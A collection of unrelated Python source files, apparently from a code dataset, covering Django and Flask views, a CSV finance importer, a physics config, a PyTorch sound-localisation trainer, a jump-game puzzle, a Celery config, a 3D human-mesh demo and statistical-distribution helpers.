sourcefile, destfile, hashphrase, prefix = args
sourcefd = open(sourcefile, 'r')
destfd = open(destfile, 'w')
omap = encrypt(sourcefd, destfd, hashphrase, prefix, options.striplinenumbers)
sourcefd.close()
destfd.close()
w = csv.writer(sys.stdout)
for e, name in omap.iteritems():
w.writerow([e, name])
|
987,177 | b24c0ba3a5a0e9acc70d64e41b79f6100d197d31 | import requests
from django.shortcuts import render
def index(request):
# TODO: this is old api call
#movies = requests.get("http://localhost:5000/Mato/movies")
movies = requests.get("http://localhost:5000/beautiful-movies")
movies = movies.json()
return render(request, 'index.html', {'title': 'movies', 'movies': movies})
# Create your views here.
def time(request):
response = requests.get("http://localhost:5000/time")
current_time = response.content.decode("utf-8")
return render(request, 'time.html', {'time': current_time})
|
987,178 | 64edaf346bd70b600f0f011464089b606f07cd3f | # -*- coding: utf-8 -*-
from core.models import Account
from core.models import AccountSplit
from core.models import Category
from core.models import CategorySplit
from core.models import Transaction
from csv import reader
from datetime import datetime
from decimal import Decimal
from django.core.exceptions import ObjectDoesNotExist
from fx import get_rate
from logging import getLogger
from re import search
logger = getLogger('importer.csv')
TYPE_REGEX = r'^.*\.csv$'
class CSVImport(object):
def __init__(self):
self.extension = 'csv'
def is_supported(self, imported_file):
return search(TYPE_REGEX, imported_file.name)
def process(self, wealth, imported_file, account):
csv_file = imported_file.file
rows = reader(csv_file)
self.categories = [];
self.transactions = [];
self.category_splits = [];
self.account_splits = [];
self.wealth = wealth;
for row in rows:
self._process_row(row, account)
def save(self):
for category in self.categories:
category.save()
for transaction in self.transactions:
transaction.save()
for split in self.account_splits:
split.transaction = Transaction.objects.get(id=split.transaction.id)
split.save()
for split in self.category_splits:
split.transaction = Transaction.objects.get(id=split.transaction.id)
split.category = Category.objects.get(id=split.category.id)
split.save()
def _process_row(self, row, from_account):
date = datetime.strptime(row[1], '%Y-%m-%d')
description = row[2]
category = row[3]
amount = Decimal(row[4])
try:
to_account = Account.objects.get(
wealth=self.wealth,
name=category)
self._create_transfer(
from_account,
to_account,
date,
description,
amount)
except ObjectDoesNotExist:
if amount < 0:
category_type = Category.TYPE_EXPENSE
transaction_type = Transaction.TYPE_WITHDRAWAL
else:
category_type = Category.TYPE_INCOME
transaction_type = Transaction.TYPE_DEPOSIT
try:
category = Category.objects.get(
wealth=self.wealth,
full_name=category,
type=category_type)
except ObjectDoesNotExist:
category = self._create_category(category, category_type)
self._create_nontransfer(
from_account,
category,
date,
description,
amount,
transaction_type)
def _create_transfer(self, from_account, to_account, date, description, amount):
if from_account == to_account:
return
transaction = Transaction(
type=Transaction.TYPE_TRANSFER,
date=date,
description=description,
wealth=self.wealth)
self.transactions.append(transaction)
account_split = AccountSplit(
account=from_account,
amount=amount,
date=date,
transaction=transaction,
type=Transaction.TYPE_TRANSFER,
wealth=self.wealth)
self.account_splits.append(account_split)
account_split = AccountSplit(
account=to_account,
amount=amount * -1,
date=date,
transaction=transaction,
type=Transaction.TYPE_TRANSFER,
wealth=self.wealth)
self.account_splits.append(account_split)
def _create_nontransfer(self, from_account, category, date, description, amount,
transaction_type):
transaction = Transaction(
type=transaction_type,
date=date,
description=description,
wealth=self.wealth)
self.transactions.append(transaction)
account_split = AccountSplit(
account=from_account,
amount=amount,
date=date,
transaction=transaction,
type=transaction_type,
wealth=self.wealth)
self.account_splits.append(account_split)
category_split = CategorySplit(
category=category,
date=date,
amount=amount * -1,
transaction=transaction,
type=transaction_type,
wealth=self.wealth)
self.category_splits.append(category_split)
def _create_category(self, name, category_type):
hierarchy = name.split(':')
accumulated = []
parent = None
for level in hierarchy:
accumulated.append(level)
try:
category = Category.objects.get(
wealth=self.wealth,
type=category_type,
full_name=':'.join(accumulated))
except ObjectDoesNotExist:
category = Category(
wealth=self.wealth,
name=level,
balance=0,
type=category_type,
parent=parent)
self.categories.append(category)
parent = category
return parent
|
987,179 | 248c7e1f0053cb3f6f3ea2c6dcaae60a7c1a4fa0 | from .main import main # noqa: F401
from .monomer import readPDB, createHolder, Holder # noqa: F401
|
987,180 | 92b3a8aee28c11e360058b259b260ef6e39e57a8 | import random
from itertools import combinations
from pathlib import Path
import torch.nn as nn
import h5py
import numpy as np
import torch
from methods.training import BaseTrainer
from methods.utils.data_utilities import to_metrics2020_format
class Trainer(BaseTrainer):
def __init__(self, args, cfg, dataset, af_extractor, valid_set, model, optimizer, losses, metrics):
super().__init__()
self.cfg = cfg
self.af_extractor = af_extractor
self.model = model
self.optimizer = optimizer
self.losses = losses
self.metrics = metrics
self.cuda = args.cuda
self.clip_length = dataset.clip_length
self.label_resolution = dataset.label_resolution
self.label_interp_ratio = int(self.label_resolution * cfg['data']['sample_rate'] / cfg['data']['hop_length'])
# Load ground truth for dcase metrics
self.num_segments = valid_set.num_segments
self.valid_gt_sed_metrics2019 = valid_set.valid_gt_sed_metrics2019
self.valid_gt_doa_metrics2019 = valid_set.valid_gt_doa_metrics2019
self.gt_metrics2020_dict = valid_set.gt_metrics2020_dict
# Scalar
scalar_h5_dir = Path(cfg['hdf5_dir']).joinpath(cfg['dataset']).joinpath('scalar')
fn_scalar = '{}_{}_sr{}_nfft{}_hop{}_mel{}.h5'.format(cfg['data']['type'], cfg['data']['audio_feature'],
cfg['data']['sample_rate'], cfg['data']['n_fft'], cfg['data']['hop_length'], cfg['data']['n_mels'])
scalar_path = scalar_h5_dir.joinpath(fn_scalar)
with h5py.File(scalar_path, 'r') as hf:
self.mean = hf['mean'][:]
self.std = hf['std'][:]
if args.cuda:
self.mean = torch.tensor(self.mean, dtype=torch.float32).cuda()
self.std = torch.tensor(self.std, dtype=torch.float32).cuda()
self.init_train_losses()
def init_train_losses(self):
""" Initialize train losses
"""
if self.cfg['training']['weight_constraints']:
self.train_losses = {
'train_loss_all': 0.,
'train_loss_sed': 0.,
'train_loss_doa': 0.,
'train_loss_weight_orthogonal': 0.
}
elif self.cfg['training']['weight_constraints_1']:
self.train_losses = {
'train_loss_all': 0.,
'train_loss_sed': 0.,
'train_loss_doa': 0.,
'train_loss_weight_orthogonal_1': 0.
}
elif self.cfg['training']['layer_constraints']:
self.train_losses = {
'train_loss_all': 0.,
'train_loss_sed': 0.,
'train_loss_doa': 0.,
'train_loss_layer_orthogonal': 0.
}
elif self.cfg['training']['layer_constraints_1']:
self.train_losses = {
'train_loss_all': 0.,
'train_loss_sed': 0.,
'train_loss_doa': 0.,
'train_loss_layer_orthogonal_1': 0.
}
elif self.cfg['training']['smoothness_loss']:
self.train_losses = {
'train_loss_all': 0.,
'train_loss_sed': 0.,
'train_loss_doa': 0.,
'train_loss_doa_smoothness': 0.
}
else:
self.train_losses = {
'train_loss_all': 0.,
'train_loss_sed': 0.,
'train_loss_doa': 0.
}
def train_step(self, batch_sample, epoch_it):
""" Perform a train step
"""
batch_x = batch_sample['waveform']
data_type = batch_sample['data_type']
batch_target = {
'ov': batch_sample['ov'],
'sed': batch_sample['sed_label'],
'doa': batch_sample['doa_label'],
}
if self.cuda:
batch_x = batch_x.cuda(non_blocking=True)
batch_target['sed'] = batch_target['sed'].cuda(non_blocking=True)
batch_target['doa'] = batch_target['doa'].cuda(non_blocking=True)
self.optimizer.zero_grad()
self.af_extractor.train()
self.model.train()
(batch_x, batch_target) = self.af_extractor((batch_x, batch_target,'train', data_type))
batch_x = (batch_x - self.mean) / self.std
if self.cfg['training']['model'] == 'SELD_ATT' or self.cfg['training']['model'] == 'SELD_ATT_LIGHT':
pred, pred_constraint = self.model(batch_x)
if self.cfg['training']['model'] == 'EINV2':
pred = self.model(batch_x)
if self.cfg['training']['model'] == 'SELD_ATT' or self.cfg['training']['model'] == 'SELD_ATT_LIGHT':
loss_dict = self.losses.calculate_attention(pred, pred_constraint,batch_target, epoch_it,self.model)
if self.cfg['training']['model'] == 'EINV2':
loss_dict = self.losses.calculate(pred, batch_target, epoch_it, self.model)
loss_dict[self.cfg['training']['loss_type']].backward(retain_graph=False)
self.optimizer.step()
self.train_losses['train_loss_all'] += loss_dict['all'].item()
self.train_losses['train_loss_sed'] += loss_dict['sed'].item()
self.train_losses['train_loss_doa'] += loss_dict['doa'].item()
if self.cfg['training']['weight_constraints']:
self.train_losses['train_loss_weight_orthogonal'] += loss_dict['loss_weight_orthogonal'].item()
if self.cfg['training']['weight_constraints_1']:
self.train_losses['train_loss_weight_orthogonal_1'] += loss_dict['loss_weight_orthogonal_1'].item()
if self.cfg['training']['layer_constraints']:
self.train_losses['train_loss_layer_orthogonal'] += loss_dict['loss_layer_orthogonal'].item()
if self.cfg['training']['layer_constraints_1']:
self.train_losses['train_loss_layer_orthogonal_1'] += loss_dict['loss_layer_orthogonal_1'].item()
if self.cfg['training']['smoothness_loss']:
self.train_losses['train_loss_doa_smoothness'] += loss_dict['loss_doa_smoothness'].item()
def validate_step(self, generator=None, max_batch_num=None, valid_type='train', epoch_it=0):
""" Perform the validation on the train, valid set
Generate a batch of segmentations each time
"""
# clearing cuda, because of memory leak
if torch.cuda.is_available():
torch.cuda.empty_cache()
if valid_type == 'train':
train_losses = self.train_losses.copy()
self.init_train_losses()
return train_losses
elif valid_type == 'valid':
pred_sed_list, pred_doa_list = [], []
gt_sed_list, gt_doa_list = [], []
loss_all, loss_sed, loss_doa, loss_orthogonal , loss_doa_smoothness = 0., 0., 0., 0., 0.
for batch_idx, batch_sample in enumerate(generator):
if batch_idx == max_batch_num:
break
batch_x = batch_sample['waveform']
data_type = batch_sample['data_type']
batch_target = {
'sed': batch_sample['sed_label'],
'doa': batch_sample['doa_label']
}
if self.cuda:
batch_x = batch_x.cuda(non_blocking=True)
batch_target['sed'] = batch_target['sed'].cuda(non_blocking=True)
batch_target['doa'] = batch_target['doa'].cuda(non_blocking=True)
with torch.no_grad():
self.af_extractor.eval()
self.model.eval()
(batch_x, batch_target) = self.af_extractor((batch_x, batch_target,valid_type, data_type ))
batch_x = (batch_x - self.mean) / self.std
if self.cfg['training']['model'] == 'SELD_ATT' or self.cfg['training']['model'] == 'SELD_ATT_LIGHT':
pred, pred_constraint = self.model(batch_x)
if self.cfg['training']['model'] == 'EINV2':
pred = self.model(batch_x)
if self.cfg['training']['model'] == 'SELD_ATT' or self.cfg['training']['model'] == 'SELD_ATT_LIGHT':
loss_dict = self.losses.calculate_attention(pred, pred_constraint,batch_target, epoch_it, self.model)
if self.cfg['training']['model'] == 'EINV2':
loss_dict = self.losses.calculate(pred,batch_target, epoch_it, self.model)
pred['sed'] = torch.sigmoid(pred['sed'])
loss_all += loss_dict['all'].cpu().detach().numpy()
loss_sed += loss_dict['sed'].cpu().detach().numpy()
loss_doa += loss_dict['doa'].cpu().detach().numpy()
if self.cfg['training']['weight_constraints']:
loss_orthogonal += loss_dict['loss_weight_orthogonal'].cpu().detach().numpy()
if self.cfg['training']['layer_constraints']:
loss_orthogonal += loss_dict['loss_layer_orthogonal'].cpu().detach().numpy()
if self.cfg['training']['weight_constraints_1']:
loss_orthogonal += loss_dict['loss_weight_orthogonal_1'].cpu().detach().numpy()
if self.cfg['training']['layer_constraints_1']:
loss_orthogonal += loss_dict['loss_layer_orthogonal_1'].cpu().detach().numpy()
if self.cfg['training']['smoothness_loss']:
loss_doa_smoothness += loss_dict['loss_doa_smoothness'].cpu().detach().numpy()
pred_sed_list.append(pred['sed'].cpu().detach().numpy())
pred_doa_list.append(pred['doa'].cpu().detach().numpy())
pred_sed = np.concatenate(pred_sed_list, axis=0)
pred_doa = np.concatenate(pred_doa_list, axis=0)
origin_num_clips = int(pred_sed.shape[0]/self.num_segments)
origin_T = int(pred_sed.shape[1]*self.num_segments)
pred_sed = pred_sed.reshape((origin_num_clips, origin_T, 2, -1))[:, :int(self.clip_length / self.label_resolution)]
pred_doa = pred_doa.reshape((origin_num_clips, origin_T, 2, -1))[:, :int(self.clip_length / self.label_resolution)]
pred_sed_max = pred_sed.max(axis=-1)
pred_sed_max_idx = pred_sed.argmax(axis=-1)
pred_sed = np.zeros_like(pred_sed)
for b_idx in range(origin_num_clips):
for t_idx in range(origin_T):
for track_idx in range(2):
pred_sed[b_idx, t_idx, track_idx, pred_sed_max_idx[b_idx, t_idx, track_idx]] = \
pred_sed_max[b_idx, t_idx, track_idx]
pred_sed = (pred_sed > self.cfg['training']['threshold_sed']).astype(np.float32)
# convert Catesian to Spherical
azi = np.arctan2(pred_doa[..., 1], pred_doa[..., 0])
elev = np.arctan2(pred_doa[..., 2], np.sqrt(pred_doa[..., 0]**2 + pred_doa[..., 1]**2))
pred_doa = np.stack((azi, elev), axis=-1) # (N, T, tracks, (azi, elev))
# convert format
pred_sed_metrics2019, pred_doa_metrics2019 = to_metrics2019_format(pred_sed, pred_doa)
gt_sed_metrics2019, gt_doa_metrics2019 = self.valid_gt_sed_metrics2019, self.valid_gt_doa_metrics2019
pred_dcase_format_dict = to_dcase_format(pred_sed, pred_doa)
pred_metrics2020_dict = to_metrics2020_format(pred_dcase_format_dict,
pred_sed.shape[0]*pred_sed.shape[1], label_resolution=self.label_resolution)
gt_metrics2020_dict = self.gt_metrics2020_dict
if self.cfg['training']['weight_constraints']:
out_losses = {
'loss_all': loss_all / (batch_idx + 1),
'loss_sed': loss_sed / (batch_idx + 1),
'loss_doa': loss_doa / (batch_idx + 1),
'loss_orthogonal': loss_orthogonal / (batch_idx + 1),
}
elif self.cfg['training']['layer_constraints']:
out_losses = {
'loss_all': loss_all / (batch_idx + 1),
'loss_sed': loss_sed / (batch_idx + 1),
'loss_doa': loss_doa / (batch_idx + 1),
'loss_layer_orthogonal': loss_orthogonal / (batch_idx + 1),
}
elif self.cfg['training']['weight_constraints_1']:
out_losses = {
'loss_all': loss_all / (batch_idx + 1),
'loss_sed': loss_sed / (batch_idx + 1),
'loss_doa': loss_doa / (batch_idx + 1),
'loss_orthogonal_1': loss_orthogonal / (batch_idx + 1),
}
elif self.cfg['training']['layer_constraints_1']:
out_losses = {
'loss_all': loss_all / (batch_idx + 1),
'loss_sed': loss_sed / (batch_idx + 1),
'loss_doa': loss_doa / (batch_idx + 1),
'loss_layer_orthogonal_1': loss_orthogonal / (batch_idx + 1),
}
elif self.cfg['training']['smoothness_loss']:
out_losses = {
'loss_all': loss_all / (batch_idx + 1),
'loss_sed': loss_sed / (batch_idx + 1),
'loss_doa': loss_doa / (batch_idx + 1),
'loss_doa_smoothness': loss_doa_smoothness / (batch_idx + 1),
}
else:
out_losses = {
'loss_all': loss_all / (batch_idx + 1),
'loss_sed': loss_sed / (batch_idx + 1),
'loss_doa': loss_doa / (batch_idx + 1),
}
pred_dict = {
'dcase2019_sed': pred_sed_metrics2019,
'dcase2019_doa': pred_doa_metrics2019,
'dcase2020': pred_metrics2020_dict,
}
gt_dict = {
'dcase2019_sed': gt_sed_metrics2019,
'dcase2019_doa': gt_doa_metrics2019,
'dcase2020': gt_metrics2020_dict,
}
metrics_scores = self.metrics.calculate(pred_dict, gt_dict)
return out_losses, metrics_scores
def to_metrics2019_format(sed_labels, doa_labels):
"""Convert sed and doa labels from track-wise output format to DCASE2019 evaluation metrics input format
Args:
sed_labels: SED labels, (batch_size, time_steps, num_tracks=2, logits_events=14 (number of classes))
doa_labels: DOA labels, (batch_size, time_steps, num_tracks=2, logits_degrees=2 (azi in radians, ele in radians))
Output:
out_sed_labels: SED labels, (batch_size * time_steps, logits_events=14 (True or False)
out_doa_labels: DOA labels, (batch_size * time_steps, azi_index=14 + ele_index=14)
"""
batch_size, T, num_tracks, num_classes = sed_labels.shape
sed_labels = sed_labels.reshape(batch_size * T, num_tracks, num_classes)
doa_labels = doa_labels.reshape(batch_size * T, num_tracks, 2)
out_sed_labels = np.logical_or(sed_labels[:, 0], sed_labels[:, 1]).astype(float)
out_doa_labels = np.zeros((batch_size * T, num_classes * 2))
for n_track in range(num_tracks):
indexes = np.where(sed_labels[:, n_track, :])
out_doa_labels[:, 0: num_classes][indexes[0], indexes[1]] = \
doa_labels[indexes[0], n_track, 0] # azimuth
out_doa_labels[:, num_classes: 2*num_classes][indexes[0], indexes[1]] = \
doa_labels[indexes[0], n_track, 1] # elevation
return out_sed_labels, out_doa_labels
def to_dcase_format(sed_labels, doa_labels):
"""Convert sed and doa labels from track-wise output format to dcase output format
Args:
sed_labels: SED labels, (batch_size, time_steps, num_tracks=2, logits_events=14 (number of classes))
doa_labels: DOA labels, (batch_size, time_steps, num_tracks=2, logits_degrees=2 (azi in radiance, ele in radiance))
Output:
output_dict: return a dict containing dcase output format
output_dict[frame-containing-events] = [[class_index_1, azi_1 in degree, ele_1 in degree], [class_index_2, azi_2 in degree, ele_2 in degree]]
"""
batch_size, T, num_tracks, num_classes= sed_labels.shape
sed_labels = sed_labels.reshape(batch_size*T, num_tracks, num_classes)
doa_labels = doa_labels.reshape(batch_size*T, num_tracks, 2)
output_dict = {}
for n_idx in range(batch_size*T):
for n_track in range(num_tracks):
class_index = list(np.where(sed_labels[n_idx, n_track, :])[0])
assert len(class_index) <= 1, 'class_index should be smaller or equal to 1!!\n'
if class_index:
event_doa = [class_index[0], int(np.around(doa_labels[n_idx, n_track, 0] * 180 / np.pi)), \
int(np.around(doa_labels[n_idx, n_track, 1] * 180 / np.pi))] # NOTE: this is in degree
if n_idx not in output_dict:
output_dict[n_idx] = []
output_dict[n_idx].append(event_doa)
return output_dict
|
987,181 | 44bab4f6e625ef9aa610b31c7a36f1f0caef74b5 | # This problem was asked by Google.
#
# You are given an array of nonnegative integers. Let's say you start at the beginning of the array and are trying to
# advance to the end. You can advance at most, the number of steps that you're currently on. Determine whether you
# can get to the end of the array.
#
# For example, given the array [1, 3, 1, 2, 0, 1], we can go from indices 0 -> 1 -> 3 -> 5, so return true.
#
# Given the array [1, 2, 1, 0, 0], we can't reach the end, so return false.
"""This is another flavor of reaching the top of stairs problem, I think. Which means it should be solvable with
dynamic programming
I think a 1-D array of boolean should be enough.
Let P(i) be if the i-th step/index is reachable from the beginning of the array
then P(i) = True if P(i - V(i)) is True, where V(i) is a range of value 0 <= value of element of i-th index,
otherwise False.
Then we return the last element of P
"""
##Google
##DP
##DynamicProgramming
from typing import List
def step_counting(lis: List[int]):
# this version is O(n * v) in time and O(n) in space, where n is length of the list and v is max value of elements
# in the list; maybe there's a way to do this with O(n) in time
assert lis
assert all([x >= 0 for x in lis])
n = len(lis)
p = [False for _ in range(n)]
p[0] = True if lis[0] > 0 else False
for i in range(n):
if p[i]:
vi = lis[i]
if vi > 0:
# GG: it's critical to spin from 1 to vi + 1, as we want to test for the value of v too, not 0 ~ v-1
for v in range(1, vi + 1):
if i + v < n:
p[i + v] = True
return p[n - 1]
assert step_counting([1, 3, 1, 2, 0, 1])
assert step_counting([3, 0, 0, 0])
assert not step_counting([0, 1, 2, 3, 2])
assert not step_counting([1, 2, 1, 0, 0])
|
987,182 | 037dbc48ea9ff2ea2a3313f584f546a19d71311a | import FWCore.ParameterSet.Config as cms
from CondTools.SiPixel.SiPixelGainCalibrationService_cfi import *
from RecoLocalTracker.SiPixelClusterizer.SiPixelClusterizer_cfi import siPixelClusters as _siPixelClusters
siPixelClustersPreSplitting = _siPixelClusters.clone()
from Configuration.ProcessModifiers.gpu_cff import gpu
from RecoLocalTracker.SiPixelClusterizer.siPixelClustersHeterogeneous_cfi import siPixelClustersHeterogeneous as _siPixelClustersHeterogeneous
from RecoLocalTracker.SiPixelClusterizer.siPixelFedCablingMapGPUWrapper_cfi import *
from CalibTracker.SiPixelESProducers.siPixelGainCalibrationForHLTGPU_cfi import *
gpu.toReplaceWith(siPixelClustersPreSplitting, _siPixelClustersHeterogeneous.clone())
|
987,183 | 116ebb7f9487cf80fa9efa45fe2713274a996517 | import logging
import os
from celery import Celery
REPORTS_BASE_PATH = os.environ.get('TIX_REPORTS_BASE_PATH', '/tmp/reports')
PROCESSING_PERIOD = int(os.environ.get('TIX_PROCESSING_PERIOD', '5'))
RABBITMQ_USER = os.environ.get('TIX_RABBITMQ_USER', 'guest')
RABBITMQ_PASS = os.environ.get('TIX_RABBITMQ_PASS', 'guest')
RABBITMQ_HOST = os.environ.get('TIX_RABBITMQ_HOST', 'localhost')
RABBITMQ_PORT = os.environ.get('TIX_RABBITMQ_PORT', '5672')
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
app = Celery('processor.tasks',
broker='amqp://{rabbitmq_user}:{rabbitmq_pass}@{rabbitmq_host}:{rabbitmq_port}//'.format(
rabbitmq_user=RABBITMQ_USER,
rabbitmq_pass=RABBITMQ_PASS,
rabbitmq_host=RABBITMQ_HOST,
rabbitmq_port=RABBITMQ_PORT
))
|
987,184 | 49d1a40d9b8595286881d0cdb84a1f803299b6f4 | import os
import sys
import os.path as osp
import argparse
import numpy as np
import torchvision.transforms as transforms
import torch.backends.cudnn as cudnn
import torch
sys.path.insert(0, osp.join('..', 'main'))
sys.path.insert(0, osp.join('..', 'data'))
from config import cfg
import cv2
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', type=str, dest='gpu_ids', default='0')
parser.add_argument('--img_path', type=str, default='input.png')
parser.add_argument('--output_folder', type=str, default='output')
parser.add_argument('--encoder_setting', type=str, default='osx_l', choices=['osx_b', 'osx_l'])
parser.add_argument('--decoder_setting', type=str, default='normal', choices=['normal', 'wo_face_decoder', 'wo_decoder'])
parser.add_argument('--pretrained_model_path', type=str, default='../pretrained_models/osx_l.pth.tar')
args = parser.parse_args()
# test gpus
if not args.gpu_ids:
assert 0, print("Please set proper gpu ids")
if '-' in args.gpu_ids:
gpus = args.gpu_ids.split('-')
gpus[0] = int(gpus[0])
gpus[1] = int(gpus[1]) + 1
args.gpu_ids = ','.join(map(lambda x: str(x), list(range(*gpus))))
return args
args = parse_args()
cfg.set_args(args.gpu_ids)
cudnn.benchmark = True
# load model
cfg.set_additional_args(encoder_setting=args.encoder_setting, decoder_setting=args.decoder_setting, pretrained_model_path=args.pretrained_model_path)
from common.base import Demoer
demoer = Demoer()
demoer._make_model()
from common.utils.preprocessing import load_img, process_bbox, generate_patch_image
from common.utils.vis import render_mesh, save_obj
from common.utils.human_models import smpl_x
model_path = args.pretrained_model_path
assert osp.exists(model_path), 'Cannot find model at ' + model_path
print('Load checkpoint from {}'.format(model_path))
demoer.model.eval()
# prepare input image
transform = transforms.ToTensor()
original_img = load_img(args.img_path)
original_img_height, original_img_width = original_img.shape[:2]
os.makedirs(args.output_folder, exist_ok=True)
# detect human bbox with yolov5s
detector = torch.hub.load('ultralytics/yolov5', 'yolov5s', pretrained=True)
with torch.no_grad():
results = detector(original_img)
person_results = results.xyxy[0][results.xyxy[0][:, 5] == 0]
class_ids, confidences, boxes = [], [], []
for detection in person_results:
x1, y1, x2, y2, confidence, class_id = detection.tolist()
class_ids.append(class_id)
confidences.append(confidence)
boxes.append([x1, y1, x2 - x1, y2 - y1])
indices = cv2.dnn.NMSBoxes(boxes, confidences, 0.5, 0.4)
vis_img = original_img.copy()
for num, indice in enumerate(indices):
bbox = boxes[indice] # x,y,h,w
bbox = process_bbox(bbox, original_img_width, original_img_height)
img, img2bb_trans, bb2img_trans = generate_patch_image(original_img, bbox, 1.0, 0.0, False, cfg.input_img_shape)
img = transform(img.astype(np.float32))/255
img = img.cuda()[None,:,:,:]
inputs = {'img': img}
targets = {}
meta_info = {}
# mesh recovery
with torch.no_grad():
out = demoer.model(inputs, targets, meta_info, 'test')
mesh = out['smplx_mesh_cam'].detach().cpu().numpy()
mesh = mesh[0]
# save mesh
save_obj(mesh, smpl_x.face, os.path.join(args.output_folder, f'person_{num}.obj'))
# render mesh
focal = [cfg.focal[0] / cfg.input_body_shape[1] * bbox[2], cfg.focal[1] / cfg.input_body_shape[0] * bbox[3]]
princpt = [cfg.princpt[0] / cfg.input_body_shape[1] * bbox[2] + bbox[0], cfg.princpt[1] / cfg.input_body_shape[0] * bbox[3] + bbox[1]]
vis_img = render_mesh(vis_img, mesh, smpl_x.face, {'focal': focal, 'princpt': princpt})
# save rendered image
cv2.imwrite(os.path.join(args.output_folder, f'render.jpg'), vis_img[:, :, ::-1])
|
987,185 | b2acc591ebd1f1e9bf281eff238563e93b537748 | #!/usr/bin/python3
"""Flask app module"""
from models import storage
from flask import Flask, render_template
from os import environ
app = Flask(__name__)
@app.teardown_appcontext
def teardown_session(session):
""" Remove current session """
storage.close()
@app.route('/states', strict_slashes=False)
@app.route('/states/<id>', strict_slashes=False)
def hbnb_states_byID_route(id=None):
""" List all state objects present in database by states_id"""
from models.state import State
states = storage.all(State).values()
if id:
get_state = None
for state in states:
if state.id == id:
get_state = state
return render_template("9-states.html", desired_state=get_state)
return render_template("8-cities_by_states.html", all_states=states)
if __name__ == '__main__':
environ['FLASK_APP'] = __file__
app.run(host='0.0.0.0', port=5000)
|
987,186 | 73dd6b44edcc3c255763ba7fe2a4c01be56600a6 | # -*- coding: utf-8 -*-
"""
Created on Sun Feb 05 15:14:33 2017
@author: Kristian
"""
import IPython.lib.latextools as latextools
import IPython.display as display
try:
from table2ascii import table2ascii
except:
print("----------WARNING----------")
print("WARNING: module table2ascii not found you can download it here:")
print("https://github.com/Snaipe/table2ascii")
print("---------------------------")
def table2ascii(*args):
raise NotImplemented("You need to download table2ascii from here: https://github.com/Snaipe/table2ascii")
import matplotlib.pyplot as plt
import sympy
from sympy import *
from sympy.stats import Chi, Normal, density, E, P, variance
from sympy import E as e
from scipy.stats import norm as sci_norm #Normal distribution
from scipy.stats import t as sci_t #t distribution
from scipy.stats import chi2 as sci_chi2 #chi^2 distribution
from scipy.stats import f as sci_f #F distribution
x, y, z, a, b, lamda, theta, r = symbols("x y z a b lamda theta r")
init_printing()
class SETTINGS(object):
def __init__(self):
self.min_confidence = 0.05 #5%
settings = SETTINGS()
#So buggy it can almost be considered useless
class PrintLatex(object):
def __init__(self, lat):
self.lat = lat
display.display(self)
def _repr_png_(self):
return latextools.latex_to_png(self.lat)
def max_1_none(*args):
found_none = False
for arg in args:
if arg == None and found_none:
raise Exception("Maximum 1 None parameter allowed")
return False
elif arg == None:
found_none = True
return True
#Page 1 in statistical tables
def phi(x):
x = float(x)
return sympify(sci_norm.cdf(x))
def solve_phi(phi_value=None, x=None):
max_1_none(phi_value, x)
if phi_value == None:
#We solve for phi, which is easy:
return phi(x)
elif x == None:
return sympify(sci_norm.ppf(float(phi_value)))
#Page 2-4 in statistical tables
def phi_inverse(p):
p = float(p)
return sympify(sci_norm.ppf(p))
def solve_phi_inverse(phi_inverse_value=None, p=None):
max_1_none(phi_inverse_value, p)
if phi_inverse_value == None:
return phi_inverse(p)
elif p == None:
return sympify(sci_norm.cdf(float(phi_inverse_value)))
#Page 5 in statistical tables
def t(f, p):
p = float(p)
f = float(f)
return sympify(sci_t.ppf(p, f))
def solve_t(t_value=None, f=None, p=None):
max_1_none(t_value, f, p)
if t_value == None:
return t(f, p)
elif f == None:
raise NotImplemented("Not implemented yet - sorry")
elif p == None:
return sympify(sci_t.cdf(float(t_value), float(f)))
#Page 6-9 in statistical tables
def chi_squared(f, p):
f = float(f)
p = float(p)
return sympify(sci_chi2.ppf(p, f))
def solve_chi_squared(chi_squared_value=None, f=None, p=None):
max_1_none(chi_squared_value, f, p)
if chi_squared_value == None:
return chi_squared(f,p)
elif f == None:
raise NotImplemented("Not implemented yet - sorry")
elif p == None:
return sympify(sci_chi2.cdf(float(chi_squared_value), float(f)))
#Page 14-49 in statistical tables
def f(f1, f2, p):
f1 = float(f1)
f2 = float(f2)
p = float(p)
return sympify(sci_f.ppf(p, f1, f2))
def solve_f(f_value=None, f1=None, f2=None, p=None):
max_1_none(f_value, f1, f2, p)
if f_value == None:
return f(f1, f2, p)
elif p == None:
return sympify(sci_f.cdf(float(f_value), float(f1), float(f2)))
else:
raise NotImplemented("Not implemented yet - sorry")
##UNGROUPED VARIABLES
def fractile_diagram_table(data):
data = [sympify(dat) for dat in data]
TABLE = {
'node': 'table',
'colspec': [20, 9, 15, 15, 20],
'rowspec': [2, 1, 1, 1, 1, 1],
'children': [
{
'node': 'head',
'children': [
{
'node': 'row',
'children': [
{'node': 'cell', 'data': 'Observation'},
{'node': 'cell', 'data': 'Number'},
{'node': 'cell', 'data': 'Cumulative number'},
{'node': 'cell', 'data': 'Probability in %'},
{'node': 'cell', 'data': 'p Fractile'}
]
},
{
'node': 'row',
'children': [
{'node': 'cell', 'data': 'y'},
{'node': 'cell', 'data': 'a'},
{'node': 'cell', 'data': 'k'},
{'node': 'cell', 'data': 'p in %'},
{'node': 'cell', 'data': 'u_p'},
]
}
]
},
{
'node': 'body',
'children': []
}
]
}
n = len(data)
observations = {}
for d in data:
if d in observations.keys():
observations[d] += 1
else:
observations[d] = 1
obsess = sorted(observations.keys())
y = []
a = []
k = []
pp = []
pf = []
y.append(obsess[0])
a.append(observations[obsess[0]])
k.append(a[0])
pp.append(100 * (k[0] / sympify(2*n)))
p = (k[0] / sympify(2*n)).evalf()
pf.append(phi_inverse(p))
i = 1
for observation in obsess[1:]:
y.append(observation)
a.append(observations[observation])
s = 0
for v in range(i):
s += a[v]
k.append(a[i] + s)
pp.append(100 * ((k[i] + k[i-1]) / sympify(2*n)))
p = (((k[i] + k[i-1]) / sympify(2*n))).evalf()
pf.append(phi_inverse(p))
i += 1
rows = len(observations.keys())
TABLE["rowspec"] = [2, 1] + [1 for i in range(rows)]
for i in range(rows):
node = {
'node': 'row',
'children': [
{'node': 'cell', 'data': str(y[i])},
{'node': 'cell', 'data': str(a[i])},
{'node': 'cell', 'data': str(k[i])},
{'node': 'cell', 'data': str(pp[i].evalf(6))},
{'node': 'cell', 'data': str(pf[i])}
]
}
TABLE["children"][1]["children"].append(node)
print(table2ascii(TABLE))
def unit_test():
assert str(phi(0) == "0.5")
assert str(phi(1.99))[:5] == "0.976"
assert str(phi(-1.09))[:5] == str(1 - 0.8621)[:5]
